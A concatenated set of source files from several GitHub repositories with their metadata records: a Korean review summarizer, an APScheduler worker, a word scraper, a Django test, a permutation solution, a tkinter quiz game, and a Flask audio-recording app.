reviews.strip())\n self.sentences = []\n self.sentence_index = 0\n\n _agent = requests.Session()\n for one_sentence in self.splited_reviews:\n while len(one_sentence) and (one_sentence[-1] == '.' or one_sentence[-1] == ' '):\n one_sentence = one_sentence.strip(' ').strip('.')\n if not one_sentence:\n continue\n if self.spell_check:\n try:\n base_url = 'https://m.search.naver.com/p/csearch/ocontent/spellchecker.nhn'\n headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'\n ,'referer': 'https://search.naver.com/'}\n payload= {\n '_callback': 'window.__jindo2_callback._spellingCheck_0'\n , 'q': one_sentence\n }\n _checked = _agent.get(base_url, params=payload, headers=headers)\n _checked = _checked.text[42:-2].split('\\\"html\\\":\\\"')[1].split('\\\"notag')[0]\n _words = []\n for word in words.split('>'):\n if not word.strip().startswith('<'):\n _words.append(word.split('<')[0].strip())\n one_sentence = ' '.join(_words)\n except:\n pass\n tokens = []\n word_tag_pairs = self.okt.pos(one_sentence)\n for word, tag in word_tag_pairs:\n if word in self.stopwords:\n continue\n if tag not in self.useful_tags:\n continue\n tokens.append(\"{}/{}\".format(word, tag))\n if len(tokens) < 2:\n continue\n sentence = SentenceObj(one_sentence.strip(), tokens, self.sentence_index)\n self.sentences.append(sentence)\n self.sentence_index += 1\n\n self.num_sentences = len(self.sentences)\n self.bm25 = BM25Okapi([sentenceObj.text for sentenceObj in self.sentences])\n for sentenceObj in self.sentences:\n sentenceObj.vector = self.bm25.get_scores(sentenceObj.text)\n \n self.matrix = np.zeros((self.num_sentences, self.num_sentences))\n for sentence1 in self.sentences:\n for sentence2 in self.sentences:\n if sentence1 == sentence2:\n self.matrix[sentence1.index, sentence2.index] = 1\n else:\n self.matrix[sentence1.index, sentence2.index] = \\\n len(set(sentence1.tokens) & set(sentence2.tokens)) / \\\n (math.log(len(sentence1.tokens)) + math.log(len(sentence2.tokens)))\n \n self.graph = networkx.Graph()\n self.graph.add_nodes_from(self.sentences)\n for sentence1 in self.sentences:\n for sentence2 in self.sentences:\n weight = self.matrix[sentence1.index, sentence2.index]\n if weight:\n self.graph.add_edge(sentence1, sentence2, weight=weight)\n self.pagerank = networkx.pagerank(self.graph, weight='weight')\n self.result = sorted(self.pagerank, key=self.pagerank.get, reverse=True)\n \n self.summaries = []\n if self.return_all:\n for i in range(len(self.result)):\n self.summaries.append(self.result[i].text)\n \n return self.summaries\n \n if self.k > len(self.result):\n for i in range(len(self.result)):\n self.summaries.append(self.result[i].text)\n else:\n for i in range(self.k):\n self.summaries.append(self.result[i].text)\n \n return self.summaries","repo_name":"kadarin123/KoreanReviewSummarizer","sub_path":"ks4r/ks4r.py","file_name":"ks4r.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32955070231","text":"\"\"\"\n@Author: cgDeepLearn\n@Contact:cglearningnow@163.com\n@File: worker.py\n@Time: 2021/9/7 15:14\n\n@docstring: \n\"\"\"\n# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport datetime\nimport socket\nimport json\nimport requests\nimport pytz\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR\nfrom config.aps import jobstores, executors, job_defaults\nfrom utils import logger\nfrom config import cfg\nfrom .process import JobParser, JobProcess\n\n\nsub_jid_separator = \":\" # 子任务分隔符\n\n\nclass APSWorker(object):\n __instance = None\n __inited = False\n\n def __new__(cls, *args, **kwargs):\n if not cls.__instance:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n def __init__(self):\n if not self.__inited:\n self.__inited = True\n tz = pytz.timezone('Asia/Shanghai')\n self.scheduler = BackgroundScheduler(\n jobstores=jobstores, executors=executors,\n job_defaults=job_defaults, timezone=tz)\n self.scheduler._logger = logger\n # add_listener\n self.scheduler.add_listener(self.my_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n self.scheduler.start()\n self.register() # 注册worker\n\n def my_listener(self, event):\n if event.exception:\n self.scheduler._logger.error(f\"{str(event.job_id)} error\")\n else:\n self.scheduler._logger.info(f\"{str(event.job_id)} run ok\")\n\n def get_jobs(self, jobstore='redis'):\n jobs = self.scheduler.get_jobs(jobstore=jobstore)\n job_ids = list()\n for job in jobs:\n job_ids.append(job.id)\n return job_ids\n\n def register(self):\n \"\"\"启动时,将worker信息注册到mgr\"\"\"\n loaded_jids = self.get_jobs()\n worker_config = cfg.get_services_cfg()\n mgr_host, mgr_port, worker_host = worker_config[-3:]\n mgr_url = f'http://{mgr_host}:{mgr_port}/task-mgr/register-worker'\n _, worker_port = cfg.get_flask_cfg()[0:2]\n # worker_host = socket.gethostbyname(socket.gethostname())\n worker_host_port = f'{worker_host}:{worker_port}'\n requests_headers = {'Content-Type': 'application/json;charset=UTF-8'}\n req_data = {\n 'worker_host': worker_host_port,\n 'all_sub_jids': loaded_jids\n }\n register_res = requests.post(mgr_url,\n data=json.dumps(req_data),\n headers=requests_headers,\n timeout=5)\n logger.info(\n f'register req: {req_data}, res: {register_res.text}')\n\n def add_task(self, task_args, jobstore='redis'):\n \"\"\"将任务下的子任务分别创建运行\"\"\"\n task_id = task_args[\"task_id\"]\n jobs_info = task_args[\"jobs_info\"]\n for sub_job_id, job_info in jobs_info.items():\n self.add_job(sub_job_id, job_info, jobstore=jobstore)\n logger.info(f\"added sub_job: {sub_job_id} of {task_id}\")\n logger.info(f\"task_id:{task_id} added\")\n\n def add_job(self, jid, job_info, jobstore='redis'):\n \"\"\"添加单个子任务\"\"\"\n trigger_info = job_info[\"trigger_info\"]\n action_info = job_info[\"action_info\"]\n ctrigger = JobParser.build_trigger(trigger_info)\n\n self.scheduler.add_job(JobProcess.run, trigger=ctrigger,\n id=str(jid), args=(jid, action_info),\n jobstore=jobstore, replace_existing=True)\n\n def remove_task(self, task_id, sub_job_ids, jobstore='redis'):\n \"\"\"删除任务下的子任务\"\"\"\n for jid in sub_job_ids:\n self.remove_job(jid, jobstore=jobstore)\n logger.info(f\"task_id: {task_id} removed jids: {sub_job_ids}\")\n\n def remove_job(self, jid, jobstore='redis'):\n \"\"\"删除单个子任务\"\"\"\n self.scheduler.remove_job(jid, jobstore=jobstore)\n logger.info(f\"jid: {jid} removed\")\n\n\naps_worker = APSWorker()\n","repo_name":"cgDeepLearn/scheduler","sub_path":"src/sworker/worker/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":4095,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27249698692","text":"# 获取单词库\n# 新东方 url = \"https://www.koolearn.com/dict/zimu_a_1.html\"\n# 词根库 url = \"http://www.etymon.cn/yingyucizhui/list_2_1.html\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\n\n# url = \"https://www.koolearn.com/dict/zimu_a_1.html\"\nurl = \"http://www.etymon.cn/yingyucizhui/list_2_1.html\"\nhead = {\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"}\nre = requests.get(url,headers=head)\nre.encoding = 'utf-8'\nhtml = re.text\n# print(html)\n\nbs = BeautifulSoup(html,features=\"html.parser\")\ndl = bs.find(\"div\",id='dictionary').find(\"dl\")\n\nfor dt in dl.find_all('dt'):\n print(dt.text)\n# print(dl.text)\n# tree = etree.HTML(html)\n\n","repo_name":"mimill123456/word_game","sub_path":"src/pre/getwords.py","file_name":"getwords.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35321603214","text":"import pytest\nfrom . import models\n\n\ndef test_credit(db):\n data = {\n 'first_name': 'Максим',\n 'last_name': 'Балабанов',\n 'iin': '911106451061',\n 'phone': '77778464774'\n }\n person = models.Person.objects.create(**data)\n data = {\n 'cash': 30,\n 'status': 'active',\n 'person': person\n }\n credit = models.Credit.objects.create(**data)\n assert isinstance(credit, models.Credit)\n","repo_name":"beisembayev/my-first-blog","sub_path":"credit/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455026648","text":"# 공부한 코드 ( https://hillier.tistory.com/102 )\nimport sys\ninput = sys.stdin.readline\ndef nextPermutation(arr):\n i = len(arr)-2\n while i >= 0 and arr[i] >= arr[i+1]:\n i -= 1\n if i == -1:\n return False\n \n j = len(arr)-1\n while arr[i] >= arr[j]:\n j -= 1\n \n arr[i], arr[j] = arr[j], arr[i]\n result = arr[:i+1]\n result.extend(list(reversed(arr[i+1:])))\n return result\n \n \nT = int(input())\nfor _ in range(T):\n _input = list(input().rstrip())\n answer = nextPermutation(_input)\n if not answer:\n print(\"\".join(_input))\n else:\n print(\"\".join(answer))\n\n# 실패한 코드 - permutations으로 조합을 만든 후 정렬하여 찾기\n# 정답은 나오지만 메모리 초과\n# import sys\n# from itertools import permutations\n\n# T = int(sys.stdin.readline())\n# for i in range(T):\n# word = sys.stdin.readline().rstrip()\n# words = [\"\".join(w) for w in permutations(word)]\n# words = sorted(set(words))\n# word_index = words.index(word)\n# if word_index == len(words)-1:\n# print(word)\n# else:\n# print(words[word_index+1])\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/51-단어_맞추기.py","file_name":"51-단어_맞추기.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20409539684","text":"# Millionaire Game Project\nfrom tkinter import *\nfrom tkinter.ttk import Progressbar\nfrom pygame import mixer\nimport pyttsx3\n\nengine = pyttsx3.init()\nvoices = engine.getProperty(\"voices\")\nengine.setProperty(\"voices\", voices[0].id)\n\nmixer.init()\nmixer.music.load(\"Image Folder/kbc.mp3\")\nmixer.music.play(-1)\n\ndef select(event):\n callButton.place_forget()\n\n progressbarA.place_forget()\n progressbarB.place_forget()\n progressbarC.place_forget()\n progressbarD.place_forget()\n\n progressbarLabelA.place_forget()\n progressbarLabelB.place_forget()\n progressbarLabelC.place_forget()\n progressbarLabelD.place_forget()\n\n b=event.widget\n value = b['text']\n\n for i in range(15):\n if value == correct_answer[i]:\n if value == correct_answer[14]:\n def Close():\n window2.destroy()\n window.destroy()\n\n def PlayAgain():\n Life_Line_50_Button.config(state=NORMAL, image=Image_50)\n Audience_Pole_Button.config(state=NORMAL, image=Audience_Pole)\n PhoneAFriend_Button.config(state=NORMAL, image=PhoneAFriend_Image)\n\n window2.destroy()\n Question_Area.delete(1.0, END)\n Question_Area.insert(my_questions[0])\n\n optionButton1.config(text=option1[0])\n optionButton2.config(text=option2[0])\n optionButton3.config(text=option3[0])\n optionButton4.config(text=option4[0])\n\n Amount_Label.config(imgage=Amount_Image)\n\n mixer.music.stop()\n mixer.music.load(\"Image Folder/Kbcwon.mp3\")\n mixer.music.play()\n\n window2 = Toplevel()\n window2.config(bg=\"black\")\n window2.geometry('500x400+140+30')\n window2.title('You Won 0 Pounds')\n imgLabel = Label(window2, image=Center_Image, bd=0)\n imgLabel.pack(pady=30)\n\n winLabel = Label(window2, text=\"You Won\", font=(\"Arial\", 40, \"bold\"), bg=\"black\", fg=\"white\")\n winLabel.pack()\n\n playagainButton = Button(window2, text=\"Play Again\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=PlayAgain)\n playagainButton.pack()\n\n closeButton = Button(window2, text=\"Close\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=Close)\n closeButton.pack()\n\n happyImages = PhotoImage(file=\"Image Folder/happy.png\")\n happyLabel = Label(window2, image=happyImages, bg=\"black\")\n happyLabel.place(x=30, y=280)\n\n happyLabel1 = Label(window2, image=happyImages, bg=\"black\")\n happyLabel1.place(x=400, y=280)\n\n window2.mainloop()\n break\n\n\n Question_Area.delete(1.0, END)\n Question_Area.insert(END, my_questions[i + 1])\n\n optionButton1.config(text=option1[i + 1])\n optionButton2.config(text=option2[i + 1])\n optionButton3.config(text=option3[i + 1])\n optionButton4.config(text=option4[i + 1])\n\n Amount_Label.config(image=Amount_Images[i])\n\n if value not in correct_answer:\n def Close():\n window1.destroy()\n window.destroy()\n\n def TryAgain():\n Life_Line_50_Button.config(state=NORMAL, image=Image_50)\n Audience_Pole_Button.config(state=NORMAL, image=Audience_Pole)\n PhoneAFriend_Button.config(state=NORMAL, image=PhoneAFriend_Image)\n\n window1.destroy()\n Question_Area.delete(1.0, END)\n Question_Area.insert(my_questions[0])\n\n optionButton1.config(text=option1[0])\n optionButton2.config(text=option2[0])\n optionButton3.config(text=option3[0])\n optionButton4.config(text=option4[0])\n\n Amount_Label.config(imgage=Amount_Image)\n\n\n window1 = Toplevel()\n window1.overrideredirect(True)\n window1.config(bg=\"black\")\n window1.geometry('500x400+140+30')\n window1.title('You Won 0 Pounds')\n imgLabel = Label(window1, image=Center_Image, bd=0)\n imgLabel.pack(pady=30)\n\n loseLabel = Label(window1, text=\"You Lose\", font=(\"Arial\", 40, \"bold\"), bg=\"black\", fg=\"white\")\n loseLabel.pack()\n\n tryagainButton = Button(window1, text=\"Try Again\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=TryAgain)\n tryagainButton.pack()\n\n closeButton = Button(window1, text=\"Close\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\",\n activebackground=\"black\", activeforeground=\"white\", bd=0, cursor=\"hand2\",\n command=Close)\n closeButton.pack()\n\n sadImages = PhotoImage(file=\"Image Folder/sad.png\")\n sadLabel = Label(window1, image=sadImages, bg=\"black\")\n sadLabel.place(x=30, y=280)\n\n sadLabel1 = Label(window1, image=sadImages, bg=\"black\")\n sadLabel1.place(x=400, y=280)\n\n window1.mainloop()\n break\n\ndef lifeLine50():\n\n Life_Line_50_Button.config(image=Image_50x, state=DISABLED)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[0]:\n optionButton1.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[1]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[2]:\n optionButton1.config(text=\"\")\n optionButton2.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[3]:\n optionButton2.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[4]:\n optionButton3.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[5]:\n optionButton2.config(text=\"\")\n optionButton4.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[6]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[7]:\n optionButton2.config(text=\"\")\n optionButton3.config(text=\"\")\n\n\ndef audiencePoleLifeLine():\n Audience_Pole_Button.config(image=Audience_Polex, state=DISABLED)\n\n\n progressbarA.place(x=580, y=190)\n progressbarB.place(x=620, y=190)\n progressbarC.place(x=660, y=190)\n progressbarD.place(x=700, y=190)\n\n progressbarLabelA.place(x=580, y=320)\n progressbarLabelB.place(x=620, y=320)\n progressbarLabelC.place(x=660, y=320)\n progressbarLabelD.place(x=700, y=320)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[0]:\n progressbarA.config(value=30)\n progressbarB.config(value=50)\n progressbarC.config(value=90)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[1]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[2]:\n progressbarA.config(value=30)\n progressbarB.config(value=50)\n progressbarC.config(value=90)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[3]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[4]:\n progressbarA.config(value=30)\n progressbarB.config(value=90)\n progressbarC.config(value=50)\n progressbarD.config(value=70)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[5]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=70)\n progressbarD.config(value=30)\n\n if Question_Area.get(1.0, \"end-1c\") == my_questions[6]:\n progressbarA.config(value=90)\n progressbarB.config(value=50)\n progressbarC.config(value=30)\n progressbarD.config(value=70)\n\n\ndef PhoneLifeLine():\n mixer.music.load('Image Folder/calling.mp3')\n mixer.music.play()\n callButton.place(x=70, y=260)\n PhoneAFriend_Button.config(image=PhoneAFriend_Imagex, state=DISABLED)\n\ndef phoneclick():\n for i in range(15):\n if Question_Area.get(1.0, \"end-1c\") == my_questions[i]:\n engine.say(f\"The Answer is {correct_answer[i]}\")\n engine.runAndWait()\n\ncorrect_answer = [\"93 million\", \"Moth\", \"Isaac Newton\", \"Lesotho\",\n \"Peru\", \"C\", \"Van Rossum\", \"1989\", \"100 billion\",\n \"Baghdad\", \"Six iron\", \"Johannes Kepler\",\"Trees\", \"1949\", \"1815\"]\n\n\n\n\n\n\n\n\n\nmy_questions = [\"The Earth is approximately how many miles away from the Sun?\",\n \"Which insect shorted out an early supercomputer and inspired the term 'computer bug'?\",\n \"Which of the following men does not have a chemical element named for him?\",\n \"Which of the following landlocked countries is entirely contained within another country?\",\n \"In the children’s book series, where is Paddington Bear originally from?\",\n \" Python is written in which language?\",\n \"Python was developed by\",\n \"Python was developed in which year?\",\n \"According to the Population Reference Bureau, what is the approximate number of people who have ever lived on earth?\",\n \"Now used to refer to a cat, the word 'tabby' is derived from the name of a district of what world capital?\",\n \"What club did astronaut Alan Shepard use to make his famous golf shot on the moon?\",\n \"What scientist first determined that human sight results from images projected onto the retina?\",\n \"If you planted the seeds of Quercus robur, what would grow?\",\n \"When did Mao Zedong come to power?\",\n \"What year did the War of 1812 end?\"\n ]\n\noption1 = [\"9.3 million\", \"Moth\",\n \"Albert Einstein\", \"Lesotho\",\n \"India\", \"C\", \"Van Rossum\",\n \"1972\", \"5o billion\", \"Baghdad\",\n \"Nine iron\", \"Galileo\", \"Trees\", \"1947\", \"1813\"]\n\n\noption2 = [\"39 million\", \"Roach\",\n \"Niels Bohr\", \"Burkina Faso\",\n \"Peru\", \"C++\",\n \"James Gosling\",\n \"1995\", \"100 billion\",\n \"New Delhi\", \"Sand wedge\",\n \"Copernicus\", \"Flowers\", \"1948\", \"1815\"]\n\noption3 = [\"93 million\", \"Fly\",\n \"Isaac Newton\", \"Mongolia\",\n \"Canada\", \"Java\",\n \"Dennis Ritchie\", \"1989\",\n \"1 trillion\", \"Cairo\",\n \"Six iron\", \"Johannes Kepler\",\n \"Vegetables\", \"1949\", \"1817\"]\n\noption4 = [\"193 million\", \"Japanese beetle\",\n \"Enrico Fermi\", \"Luxembourg\",\n \"Iceland\", \"None of the above\",\n \"Bjarne Stroustrup\", \"1981\",\n \"5 trillion\", \"Moscow\",\n \"Seven iron\", \"Isaac Newton\", \"Grain\", \"1950\", \"1821\"]\n\n\n\n\n\n\n\n\n\n\n\n# WINDOW SETUP\nwindow = Tk()\nwindow.geometry('1270x652+0+0')\nwindow.title(\"Who Wants To Be a Millionaire Created By BiPLoB DAsH\")\nwindow.config(bg=\"black\")\n\n# CREATE FRAME\nLeft_Frame = Frame(window, bg=\"black\", padx=90)\nLeft_Frame.grid(row=0, column=0)\n\nTop_Frame = Frame(Left_Frame, bg=\"black\", pady=15)\nTop_Frame.grid()\n\nCenter_Frame = Frame(Left_Frame, bg=\"black\", pady=15)\nCenter_Frame.grid(row=1, column=0)\n\nBottom_Frame = Frame(Left_Frame)\nBottom_Frame.grid(row=2, column=0)\n\nRight_Frame = Frame(window, pady=25, padx=50, bg=\"black\")\nRight_Frame.grid(row=0, column=1)\n\n\n# TOP PHOTO SETUP\nImage_50 = PhotoImage(file=\"Image Folder/50-50.png\")\nImage_50x = PhotoImage(file=\"Image Folder/50-50-X.png\")\nAudience_Pole = PhotoImage(file=\"Image Folder/audiencePole.png\")\nAudience_Polex = PhotoImage(file=\"Image Folder/audiencePoleX.png\")\nPhoneAFriend_Image = PhotoImage(file=\"Image Folder/phoneAFriend.png\")\nPhoneAFriend_Imagex = PhotoImage(file=\"Image Folder/phoneAFriendX.png\")\n\n# TOP BUTTON CREATED\n# Life Line Button\nLife_Line_50_Button = Button(Top_Frame, image= Image_50, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80, command=lifeLine50)\nLife_Line_50_Button.grid(row=0, column=0)\n\n# Audience Pole Button\nAudience_Pole_Button = Button(Top_Frame, image= Audience_Pole, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80,\n command=audiencePoleLifeLine)\nAudience_Pole_Button.grid(row=0, column=1)\n\n# Phone A Friend Button\nPhoneAFriend_Button = Button(Top_Frame, image= PhoneAFriend_Image, bg=\"black\", bd=0, activebackground=\"black\", width=180, height=80,\n command=PhoneLifeLine)\nPhoneAFriend_Button.grid(row=0, column=2)\n\ncallimage = PhotoImage(file=\"Image Folder/phone.png\")\ncallButton = Button(window, image=callimage, bd=0, bg=\"black\", activebackground=\"black\", cursor='hand2', command=phoneclick)\n\n\n# CENTER PHOTO SETUP\nCenter_Image = PhotoImage(file=\"Image Folder/center.png\")\n\n# Center Label\nCenter_Label = Label(Center_Frame, image = Center_Image, bg=\"black\", width=300, height=200)\nCenter_Label.grid(row=0, column=0)\n\n\n# RIGHT PHOTO SETUP\nAmount_Image = PhotoImage(file=\"Image Folder/Picture0.png\")\nAmount_Image1 = PhotoImage(file=\"Image Folder/Picture1.png\")\nAmount_Image2 = PhotoImage(file=\"Image Folder/Picture2.png\")\nAmount_Image3 = PhotoImage(file=\"Image Folder/Picture3.png\")\nAmount_Image4 = PhotoImage(file=\"Image Folder/Picture4.png\")\nAmount_Image5 = PhotoImage(file=\"Image Folder/Picture5.png\")\nAmount_Image6 = PhotoImage(file=\"Image Folder/Picture6.png\")\nAmount_Image7 = PhotoImage(file=\"Image Folder/Picture7.png\")\nAmount_Image8 = PhotoImage(file=\"Image Folder/Picture8.png\")\nAmount_Image9 = PhotoImage(file=\"Image Folder/Picture9.png\")\nAmount_Image10 = PhotoImage(file=\"Image Folder/Picture10.png\")\nAmount_Image11 = PhotoImage(file=\"Image Folder/Picture11.png\")\nAmount_Image12 = PhotoImage(file=\"Image Folder/Picture12.png\")\nAmount_Image13 = PhotoImage(file=\"Image Folder/Picture13.png\")\nAmount_Image14 = PhotoImage(file=\"Image Folder/Picture14.png\")\nAmount_Image15 = PhotoImage(file=\"Image Folder/Picture15.png\")\n\nAmount_Images = [Amount_Image1, Amount_Image2, Amount_Image3, Amount_Image4, Amount_Image5, Amount_Image6,\n Amount_Image7, Amount_Image8, Amount_Image9, Amount_Image10, Amount_Image11, Amount_Image12,\n Amount_Image13, Amount_Image14, Amount_Image15]\n\n# Right Label\nAmount_Label = Label(Right_Frame, image = Amount_Image, bg=\"black\")\nAmount_Label.grid(row=0, column=0)\n\n\n# BOTTOM PHOTO SETUP\nLayout_Image = PhotoImage(file=\"Image Folder/lay.png\")\n\n# Bottom Label\nLayout_Label = Label(Bottom_Frame, image= Layout_Image, bg=\"black\")\nLayout_Label.grid(row=0, column=0)\n\n\n# QUESTION AREA\nQuestion_Area = Text(Bottom_Frame, font=(\"Arial\", 14, \"bold\"), width=40, height=2, wrap=\"word\", bg=\"black\", fg=\"white\", bd=0)\nQuestion_Area.place(x=70, y=10)\nQuestion_Area.insert(END, my_questions[0])\n\nlabelA = Label(Bottom_Frame, text=\"A:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelA.place(x=60, y=110)\noptionButton1 = Button(Bottom_Frame, text=option1[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton1.place(x=100, y=100)\n\nlabelB = Label(Bottom_Frame, text=\"B:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelB.place(x=330, y=110)\noptionButton2 = Button(Bottom_Frame, text=option2[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton2.place(x=370, y=100)\n\nlabelC = Label(Bottom_Frame, text=\"C:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelC.place(x=60, y=190)\noptionButton3 = Button(Bottom_Frame, text=option3[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton3.place(x=100, y=180)\n\nlabelD = Label(Bottom_Frame, text=\"D:\", bg=\"black\", fg=\"white\", font=(\"Arial\", 16, \"bold\"))\nlabelD.place(x=330, y=190)\noptionButton4 = Button(Bottom_Frame, text=option4[0], font=(\"Arial\", 13, \"bold\"), bg=\"black\", fg=\"white\", bd=0, activebackground=\"black\",\n activeforeground=\"white\", cursor=\"hand2\", padx=9, pady=9)\noptionButton4.place(x=370, y=180)\n\n\nprogressbarA = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarB = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarC = Progressbar(window, orient=VERTICAL, length=120)\nprogressbarD = Progressbar(window, orient=VERTICAL, length=120)\n\n\nprogressbarLabelA = Label(window, text=\"A\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelB = Label(window, text=\"B\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelC = Label(window, text=\"C\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\nprogressbarLabelD = Label(window, text=\"D\", font=(\"Arial\", 20, \"bold\"), bg=\"black\", fg=\"white\")\n\n\noptionButton1.bind(\"\", select)\noptionButton2.bind(\"\", select)\noptionButton3.bind(\"\", select)\noptionButton4.bind(\"\", select)\n\n\n\n\nwindow.mainloop()","repo_name":"BiplobDash/Millionaire-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20527219162","text":"from flask import Flask\nimport pyaudio\nimport wave\nimport os\nfrom listener.listener import record_audio\nfrom audio_recognition.audio_recognition import shazam_test\nimport time\nimport asyncio\nimport nest_asyncio\nnest_asyncio.apply()\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Flask app is running'\n\n# This route is accessible at [IP_ADDRESS]:5000/listener_test\n# Functionality\n##### Record for 5 seconds\n##### Output file test_snippet_[timestamp] in the song_snippets_test folder\n@app.route('/listener_test')\ndef listener_test():\n print(\"running listener test\")\n\n snippet_duration = 5 #seconds\n output_folder = 'song_snippets_test'\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # Generate a unique filename for the snippet\n\n ### Get timestring\n timestr = time.strftime(\"%Y%m%d_%H%M%S\")\n\n ## Create filename\n filename_str = 'test_snippet_'+timestr+'.wav'\n\n ## Join to path\n snippet_filepath = os.path.join(output_folder, filename_str)\n\n print(snippet_filepath)\n \n try:\n status = record_audio(snippet_filepath, snippet_duration)\n print(status)\n except Exception as e: \n print(e)\n\n# This route is accessible at [IP_ADDRESS]:5000/begin_listener\n# Functionality:\n##### Begin recording\n##### Output and save a 5 second snippet every 15 seconds\n@app.route('/begin_listener')\ndef begin_listener():\n\n print(\"beginning listening\")\n\n snippet_duration = 5 #seconds\n interval_duration = 15 #seconds\n total_recording_time = 60 #seconds\n\n # Define output folder\n output_folder = 'song_snippets'\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n \n # start recording loop\n total_loops = int(total_recording_time / interval_duration)\n \n for i in range(total_loops):\n\n # Define filename\n timestr = time.strftime(\"%Y%m%d_%H%M%S\") # Get timestring\n filename_str = 'snippet_'+timestr+'.wav' # Create filename\n\n # Join to path\n snippet_filepath = os.path.join(output_folder, filename_str)\n\n try:\n status = record_audio(snippet_filepath, snippet_duration)\n print(status)\n except Exception as e: \n print(e)\n\n time.sleep(interval_duration-snippet_duration)\n\n return \"Snippets complete\"\n\n\n# This route is accessible at [IP_ADDRESS]:5000/test_shazam\n# Functionality:\n##### pick a filename and see if shazam recognizes it\n@app.route('/test_shazam')\nasync def test_shazam():\n filepath = 'song_snippets/test_snippet_20230524_131852.wav' # the breeze - dr dog\n filepath = 'song_snippets/test_snippet_20230524_132647.wav' #random shit\n\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(shazam_test(filepath))\n\n return \"complete\"\n\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"kennygrosz/silent-disco","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2476945254","text":"# -*- coding: utf-8 